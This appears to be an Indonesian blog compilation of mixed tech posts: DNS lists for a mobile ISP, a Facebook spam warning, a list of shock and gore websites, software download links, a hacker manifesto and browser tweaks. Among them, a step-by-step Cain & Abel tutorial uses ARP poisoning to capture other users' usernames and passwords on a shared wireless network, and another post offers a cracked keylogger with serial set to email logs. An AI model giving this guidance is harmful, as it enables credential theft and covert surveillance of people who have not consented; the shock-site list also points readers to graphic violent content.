* 202.159.32.2
* 202.159.33.2

indosat.net.id
* 202.155.0.20
* 202.155.0.15
* 202.155.30.227

itb.ac.id
* 202.249.24.65
* 167.205.23.1
* 167.205.22.123
* 167.205.30.114

ukdw.ac.id
* 222.124.22.18

sat.net.id
* 202.149.82.25
* 202.149.82.29

setting ini sangat cocok untuk telkomsel flash unlimited karena koneksinya sering down.
temen udah buktiin, dan hasilnya sangat memuaskan. koneksi internet telkomsel flash temen sekarang jarang sekali down bahkan tidak pernah konek
tapi ingat jangan disalah gunakan,,

Semoga berguna

Cara Menghentikan Spam TinyURL Facebook

Posted Image
Jika Anda melihat banyak kependekan URL mewarnai Facebook, berhati-hatilah. Ini spam yang marak di akun masyarakat.

Tiny URL merupakan cloaking URL atau fasilitas memperpendek URL pengguna. Keuntungannya, masyarakat bisa menyingkat nama web menjadi lebih pendek dan menyembunyikan nama asli dari situs yang kita ingin publikasikan. Beberapa pihak menganggap ini menjadi bagian dari bisnis di internet yang disebut affiliate marketing.

Sayangnya, beberapa pengguna internet mengaku terganggu dengan kehadiran spam Facebook berupa Tiny URL. Beberapa di antaranya http:tinyurl.com/xxxxxxxxxx.

Lihat saja ada akun Facebook milik seorang anak SD yang tiba-tiba memuat status terbaru yang jorok dan tidak sesuai dengan usianya. “SAYA MAHO, SIAPA YANG MAU AKU ISAP ♥. Cape nih c*l* sendirianliat aja nih vidio ku http://bit.ly/XXXXX”. Padahal pemilik akun itu jelas tidak menuliskan status seperti itu. Jelas saja spam semacam ini sangat mengganggu pemilik akun.

Pengamat teknologi Budi Raharjo menegaskan kepada masyarakat bahwa fenomena ini cukup berbahaya. Karenanya, jangan mengakses URL itu meskipun disertai kalimat yang menarik.

“Banyak tipe dari jenis spam ini. Biasanya, orang yang klik akan secara otomatis kalimat di status teman mereka dan pengguna akun itu kadang tidak menyadarinya. Yang bahaya, jika URL itu terhubung dengan situs porno atau permohonan ganti kata kunci palsu,” ujar Budi Raharjo.

Bentuk penipuan via perpendekan URL ini adalah munculnya situs yang seolah Facebook dan meminta pengguna mengganti kata kunci atau mencantumkan alamat email. Selanjutnya, penyebar spam itu akan mencuri kata kunci atau mencoba mengakses email pengguna.

“Inilah bahayanya. Kadang, banyak masyarakat yang menyimpan data penting di email. Kalau password dicuri, kita yang rugi sendiri. Cara terbaik untuk menghentikannya adalah Anda perlu log out dari Facebook dan mengganti password Facebook,” tegas Budi.

Selain itu, agar tidak tertipu, pengguna dapat klik ‘Preview Feature’ di sebelah kiri lalu mengakses tulisan ‘click here to enable previews’. Inilah cara untuk melihat link yang disembunyikan oleh Tiny URL.

Daftar Situs paling berbahaya dan menyebalkan Wajib diketahui

Jangan coba2x Klik link dibawah ini ya,, nnti bahaya !!!
TKP aja lah

ane mau ngasih tau aja nih buat agan-agan biar tau situs-situs yang paling menyeramkan dan meyebalkaN


ini dia gan ayyo lihat dan baca jangan sampe kelewat satupun


1. http://killerjo.net/
pasti dah pada tau ini situs apa.. neh situs paling terkenal.. suaranya itu lho

2. http://gandhi.isgreat.org/
situs ini menyeramkan bikin kaget orang bahkan lebih parah dari killerjo.. !

3. http://urangsunda.50...om/Noclick.html
situs ini mengajak anda untuk berolahraga jari telunjuk karena anda harus trus2an mengklik sampai habis dan tidak bisa di close

4. http://www.1227.com/
Situs ini mengajak anda untuk berkaraoke tapi dengan cara yang tidak biasa karena menggunakan javascript yang lain. Satu hal yang pasti anda tidak akan bisa keluar atau menutup tab pada browser sebelum anda menyelesaikan liriknya chekidot

5. http://www.d1gdo.com/admin/
6. http://d1gdo.com/images
katanya bikin mozillanya jadi muter2

7. http://subang.co.tv/
Untuk situs ini anda diharuskan untuk mengaktifkan Flash Player pada browser anda, karena filenya berupa flash lalu dengar dan lihat apa yang terjadi. ini cuma saudara killerjo gambarnya pun gambar kilerjo

8. http://esc-creation.com/scream
isinya menakutkan…

9. http://sukatoro.com/
neh web paling menjijikkan.. masa orang lagi pup diliatin dimakan lagi tuh pupnya astaga

10. http://www.kenapa-ini.blogspot.com/
sesuai judul webnya bikin orang nyebut ‘kenapa ini’

11. http://nobrain.dk/
katanya isinya ad orang lagi maho.. $R@#%#^$%????

12. http://www.themobiletracker.com/
Jika anda ingin melacak keberadaan seseorang dengan nomor Hpnya disinilah tempatnya, tampilan situs ini cukup resmi, namun pepatah juga mengatakan”jangan hanya melihat buku dari sampulnya, tapi juga isinya” begitu juga dengan situs ini. Pertamanya emang cukup meyakinkan, tapi selanjutnya…??

13. [media]http://members.home.nl/saen/Special/Zoeken.swf[/media]
Ini adalah sebuah kuis dimana anda harus mencari perbedaan dari dua buah gambar, tapi ada kejutan diakhirnya

14. http://www.boi.netai.net/
klo gk slah neh situs yg bsa buat browser kyak “hang”, kta tmn gw sih firefox bsa “lari-lari” & pndh-pndh..

15. http://www.hotel626.com/
maennya kita disuruh nginep di hotel yg penuh setan,ubah time di komputer lo jadi 6:00 pm karena sesuai dgn namanya 6 to 6 jadi dari jam 6 malam ke 6 pagi

16. http://wwwwwwwww.jodi.org/
dilihat dari URLnya saja sudah aneh banget ya gak?? wwwwwwwww. ada hurup W 9 kali disana.. haaaa
terus yang jika anda page source, akan muncul teka-teki gambar yang lumayan aneh. seperti gambar mesin namun apa maksut dari gambar itu gw gak paham
dan jangan salah jika anda klick layar pada gambar akan muncul suatu link yang sulit dipahami, silahkan anda coba sendiri

17. http://404.jodi.org/ae/
nah kalau website yang ini sama sech sebetulnya namun berbeda dengan yang tadi kalau tadi hurup w 9 kali kalai ini malah 404, seperti kode eror saja pikir saya heeeee
dan jika di page source malah blank tak ada apa-apa. hu_uh tak tau lah website apa ini..
web site yang satu ini ada Link yang terletak pada gambar hewan seperti kambing yang meghubungkankan suatu link. dan link itu juga perlu pemahaman sendiri. heeeeeeee

18. http://rotten.com/
web paling mengenaskan sekaligus sara jadi itu web kayak orang mati dilindes Tank, orang mati ditembak shotgun dari deket, ada yang mati dimakan binatang, ada bayi dipotong-potong ama ibunya (Vidio), Wartawan Pers di Irak dipenggal kepalanya, diliatin smua… Penasaran coba ajah

20. http://www.asylum626.com/

21. http://truth.mcdonalds-revealed.com/
jgn diklik…,ada virusnya+jadi SPAM truss di FB….

22. http://www.joyangeles.com/
web ini hampir mirip kayak sukatoro..

23. http://www.fragskin.com
ati2 gan,, isinya gambar maho n gak isa dimatiin jg…

24. http://www.joyangeles.com/
web ini hampir mirip kayak sukatoro..

25. http://www.googlehammer.com
jgn dibuka lho isinya maho ==” tapi bisa ditutup, yg liat bisa mati mendadak wkkwkwkwkwkkwkw

26. http://www.moldy*men.com/
web yang katanya bikin orang frustasi.. mending langsung liat aj ke TKP

27. http://goobel.50webs.com
BTW tuh isinya sedikit mirip no click dan google gerak” .. tapi nanti suara teria subang adaa di setiap click .. padahal NO SOUND .

28. http://www.fadebook.com/
di suruh olah raga jari tuh klo g slh soalnya pernah di post sih webnya

29. http://www.salahkamar.com/
jngn nyesel, kalo gak pngen nyesel mangkanya suruh orang lain aja buat jadi tumbalnya, ane belom pernah sih tapi kata temen ane isinya campuran kalo dah di klik gak bisa di close atau restart bahkan di shutdown
kalo cara close nya mudah tinggal matiin aja langsung dari sekeringnya selesai deh
tapi bener loh kata temen ane gan isinya itu campuran gan ada orang maho @#$%$@%%& terus ada
gambar hantunya ada orang di bunuh serem pokoknya terus mozila nya jadi kecil besar sendiri

30. http://www.rumdesign.com/wrong/
fokus ke ke jendela tunggu 1 menit dan lihat kejutannya..!!


31. http://www.kiwil-cur...gan-Di-Klik.htm
cuma web olahraga jari hampir sama kyk urangsunda cuma suruh klik2an aj terus2an ampe selesai bagi yg gak sabaran restart aj kompinya…

32. http://www.luna-maya.com/
ini ngagetin klo mau matiin suara kompi

33. http://www.geryadrian.com/

34. http://www.youtube.com/666
coba refresh ampe 10 X atau lebih dan liat hasilnya weeee…
entar youtubenya berubah jadi merah darah gitu…. dan langsung buffering video sendiri….
kita mesti nonton video itu kagak bisa di close atau di tutub tabnya….
untuk penjelasan youtube 666 neh ada gambarnya



35. http://piepra.talk4fun.net
baru saja w menemukan situs yg jahil abis, w dah nyoba masuk …dan ini memang hanya untuk lucu2an.
Situs ini tdk berbahaya…hanya permainan javascript ada yg berani coba…silakan

36. http://bit.ly/4ZibPJ
w barusan dikirimin teman dikasih link yang lucu sich. Kalo mau lihat silahkan klik aja. Ya responku sih agak kaget juga. Tapi karena dah sering liat itu jadi terbiasa dech…

Menseting FLASH UNLIMITIED biar cepat

Sebelumnya Download Dlo Alat Nya :
 http://www.ziddu.com/download/12364968/TreeWalk.zip.html

langkah 1
-buka control panel,network and internet,network connection
-lalu klick kiri,properties, pada gambar komputer yang diberi nama telkomsel
-pilih tab networking
-klick properties pada internet protocol version 4 (tcp/ipv4)
-ubah obtain DNS server automatically menjadi use the following DNS server addresses
-masukin ini ke kolom tsb 127.0.0.1 kemudian OK
-nah disconnected modem kamu lalu connetkan kembali..
-taraaaa.. cepat deh tuh koneksi..

RealPlayer 14.0.6.666

RealPlayer has always enabled you to play RealAudio (*.ra) and RealMedia (*.ram) files.

* Download videos from thousands of Web sites with just one click
* Build your own video library and playlists
* Play all major audio and video formats
* Flash Video support
* DVD, SVCD, VCD burning and video recording

RealPlayer for personal use includes audio CD burning capabilities, DVR-style playback buffering, multimedia search, Internet radio, a jukebox-style file library, an embedded web browser (using Microsoft Internet Explorer), and the ability to transfer media to a number of portable devices, including Apple's iPod, MP3 players, and Windows Media devices.

Download :.

http://id.real.com/

Firefox 7.0 Beta 5

The Web is all about innovation, and Firefox sets the pace with dozens of new features to deliver a faster, more secure and customizable Web browsing experience for all.

User Experience. The enhancements to Firefox provide the best possible browsing experience on the Web. The new Firefox smart location bar, affectionately known as the "Awesome Bar," learns as people use it, adapting to user preferences and offering better fitting matches over time.

Performance. Firefox is built on top of the powerful new Gecko platform, resulting in a safer, easier to use and more personal product.

Security. Firefox raises the bar for security. The new malware and phishing protection helps protect from viruses, worms, trojans and spyware to keep people safe on the Web.

Customization. Everyone uses the Web differently, and Firefox lets users customize their browser with more than 5,000 add-ons.

Download :

http://www.mozilla.org/en-US/firefox/fx/

Google Chrome 15.0.874.21 Beta

Google Chrome is a browser that combines a minimal design with sophisticated technology to make the web faster, safer, and easier.

One box for everything

Type in the address bar and get suggestions for both search and web pages.

Thumbnails of your top sites

Access your favorite pages instantly with lightning speed from any new tab.

Incognito mode

Don't want pages you visit to show up in your web history? Choose incognito mode for private browsing.

Safe browsing

Google Chrome warns you if you're about to visit a suspected phishing, malware or otherwise unsafe website.

Download :

http://www.filehippo.com/download_google_chrome/download/e1f35f65e71e4854efcd2f8529277b05/

RemShutdown v.2.6.0.0

Posted Image

Remote Shutdown v.2.6.0.0
Remote Shutdown adalah sebuah aplikasi yang powerfull yang mampu untuk mematikan komputer dari jarak jauh. Jadi bagi anda para administrator jaringan, akan sangat terbantu sekali dengan aplikasi ini. Aplikasi ini hanya bekerja di Jaringan LAN asal anda. Dengan software ini kita bisa mematikan banyak komputer dengan hanya satu klik saja.

Download :

http://www.mediafire.com/?7wd6v1yakuqu1ka

KMPlayer 3.0.0.1442

The KMPlayer is a versatile media player which can cover various types of container format such as VCD, DVD, AVI, MKV, Ogg Theora, OGM, 3GP, MPEG-1/2/4, WMV, RealMedia, and QuickTime among others. It handles a wide range of subtitles and allows you to capture audio, video, and screenshots in many ways.

The player provides both internal and external filters with a fully controlled environment in terms of connections to other splitters, decoders, audio/video transform filters and renderers without grappling with the DirectShow merit system. Internal filters are not registered to user's system to keep it from being messed up with system filters.


Download :


http://www.filehippo.com/download_kmplayer/download/caeb063b73c69f23c4f3fb4717b5b9c7/

Apa Itu Hacker

Hacker... ...sebuah kata yang aneh... Apakah sebenarnya hacker itu?
Saya pikir setiap setiap hacker punya definisinya sendiri-sendiri, kami semua
punya alasannya...
Saya adalah seorang hacker karena saya ingin tahu,
Saya ingin melanjutkan ke tahap berikutnya,
saya ingin tahu bagaimana ini bekerja,
Saya ingin mengerti,
Saya tidak ingin dibatasi oleh sebuah sistem keamanan,
saya ingin semuanya gratis,
Saya tidak ingin merusak keamanan,
saya ingin mengambil tantangan, untuk menjadi lebih baik setiap hari.
Hackers tahu bagaimana caranya untuk menjadi berbahaya...
Tujuan kami hanyalah Pengetahuan,
dan karena Pengetahuan adalah Kekuatan,
kami dianggap berbahaya.
Tetapi kami tidak berbahaya, kami punya Kode Etik, kami menghormati aturan.
Hanya riffraff (saya tidak tahu apa artinya :icon_devil:, red) yang ingin mencuri,
menyalahgunakan atau memerasmu untuk keuntungan materi.
Kamu tidak perlu berpikir yang menakutkan, kami tidak ingin menyerangmu
tanpa alasan yang baik untuk melakukannya.
Kami bukanlah orang gila, kami tidak menyebabkan kerusakan hanya untuk
kesenangan.
Ya beberapa hackers adalah pencuri, mereka hanya menghack hanya untuk
mencuri uang atau keuntungan material.
saya tidak suka orang yang seperti ini, mereka adalah penyakit.
Menurutku, kami sangat berguna.
Kami membantu orang-orang untuk memperkuat sistem keamanan, kami ingin para administrator melakukannya. Di sisi lain, kami adalah user, sama sepertimu.
Kami sangat berguna, karena kami mempunyai mempunyai pandangan,
pandangan untuk melihat apa yang tak terlihat orang lain, pandangan dimana
tidak ada sesuatu untuk dijual.
Pandangan ini berbeda dari yang lain, saat mereka berkata padamu bawah
privasi bernilai jutaan dolar, kami berkata padamu bahwa mereka menjual
privasimu untuk bayaran berupa emas, saat mereka berkata kepadamu bahwa
sistem itu aman, kami berkata tidak kepadamu.
Dengarkan kami, bukan kewajibanmu untuk percaya kepada kami, tapi bukalah
pikiranmu, tanyalah kepada dirimu sendiri mana yang benar. Apakah kamu
pernah berpikir bahwa semua komputer berasal dari source yang sama?
Mereka ingin kamu membenci kami, untuk takut kepada kami.
jangan percayai mereka, percaya atau tidak, cobalah untuk mengerti...
Jadi, habiskan beberapa menit dengan kami, ambil waktu untuk belajar, untuk
melihat sesuatu dari mata kami... ...segala sesuatunya akan terlihat berbeda.
Selamat datang di sisi kami, sisi dimana banyak yang ingin tahu.

HAYATI / BACA-BACA BAIK UNTUK YANG BENAR-BENAR MERASA BAHWA DIRI NYA ADALAH SEORANG HACKER

Meningkatkan Kinerja PC untuk Gaming dengan GBoost

Posted Image

Fitur utama

* Mudah digunakan – 1 klik Boost
* Tidak ada perubahan Permanen
* Tidak Overclocking
* Smoother bermain game
* Hasilnya terlihat
* Tidak ada interupsi
* Mengurangi Lag
* Meningkatkan’s PC

GBoost adalah alat yang bagus untuk dimiliki jika PC anda berjalan
lambat dan masih ingin bermain game. Pastikan, Anda telah menyelamatkan
semua pekerjaan sebelum anda menekan tombol bost karena akan menutup
pekerjaan yang belum disimpan.

 Download :
http://gboost.gzero.com/gzeroinstaller/GBoostInstaller.exe
Cain & Abel adalah sebuah program Recovery Password sekaligus Pengendus Jaringan dari Massimiliano Montoro yang bisa didownload pada http://www.oxid.it/. Jika anda belum mengetahui apa itu pengendus jaringan, mungkin kata network analyzer bisa membantu. Atau jika tidak, mungkin anda pernah mendengar sebuah tool bernama ethereal (Sekarang namanya wireshark-hiu kabel-)? Singkatnya, dua-duanya adalah Sniffer.

Cain & Abel mudah digunakan untuk pemula karena lebih enak dilihat untuk mata pemula :P. Lebih sedikit berwarna-warni jika dibandingkan dengan ethereal. Oke, cukup bicara tentang ethereal karena judul diatas berbicara mengenai Cain & Abel. Dua anak nabi Adam yang kali ini tidak saling membunuh tapi malah bekerjasama membantu anda :D.

Cain & Abel mempunyai banyak fungsi salah satunya yaitu merekam kegiatan orang lain yang berada dalam satu jaringan wireless dengan kita misalnya username dan password orang bisa kita dapatkan

Bagaimana cara menggunakannya? Ikuti langkah-langkah berikut.

1. Download Cain & Able.
 http://www.ziddu.com/download/15321763/ca_setup_3.exe.html

2. Buka Cain & Able dan instal seperti biasanya.
3. Setelah selesai diinstal maka program akan muncul seperti gambar berikut.

Resized to 73% (was 959 x 548) - Click image to enlargePosted Image



4. Klik start/stop sniffer.
5. Klik kanan dan pilih Scan MAC Addresess. lihat gambar.

Resized to 73% (was 962 x 550) - Click image to enlargePosted Image



6. Setelah itu pilih APR tepatnya di sebelah kanan Hosts.
7. Klik Add to list, iconnya tanda plus berwarna biru.

Posted Image

* Pilih target yang anda inginkan lalu klik OK.

8. Klik start/stop APR.

Resized to 73% (was 963 x 551) - Click image to enlargePosted Image


9. Klik Passwords. Dan anda dapat melihat password yang terrecord.

Resized to 73% (was 964 x 549) - Click image to enlarge
Posted Image
 
* Lihat banyak sekali username dan password yang kita dapatkan.

Actual Spy [ KeyLogger Pro ] No Ribet + Serial

ini nih gan..
keylogger yg lbh mantep dri semua keylogger yg bersifat Installation tentunya..
cara pake juga no ribet..
habis di install tgl di edit aja seting-settingnya yg ada..
seperti "Send logs With Email" De eL eL..
nih SSnya supaya gag dibilang Hoax..

Posted Image

Posted Image


Download :


http://www.ziddu.com/download/10889522/ActualSpy.rar.html

Langkah Mempercepat Mozilla Firefoxs

1. Buka Mozilla.

2. Ketikan di addres bar “about:config” (tanpa tanda patik).

3. Scroll mouse anda kebawah dan cari “network.http.max-connections“, double klik dan masukan nilai “64“.

4. Cari “network.http.max-connections-per-server“, double klik dan masukan nilai “21“.

5. Cari ‘network.http.max-persistent-connections-per-server“, double klik dan masukan nilai “8“.

6. Doube klik pada “network.http.pipelining ” menjadi “true“.

7. Cari “network.http.pipelining.maxrequests“, double klik dan masukan nilai “100“.

8. Double klik pada “network.http.proxy.pipelining” menjadi “true“.

9. Langkah terakhir, klik kanan dimana saja pilih : New >> integrar >> lalu tulis “nglayout.initialpaint.delay” (tanpa tanda petik”. Kemudian masukan nilai “0“.
Posted Image

FireFox addons adalah salah satu fitur tambahan browser firefox yang dapat meningkatkan kecepatan firefox ketika browsing. Fasterfox dapat meningkatkan kecepatan sebesar 5 – 20% dari browsing biasanya, jika tanpa menggunakan program ini.


Download :


https://addons.mozilla.org/en-US/firefox/addon/RsccmanFasterfox/

Blokir Website Via Notepad

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.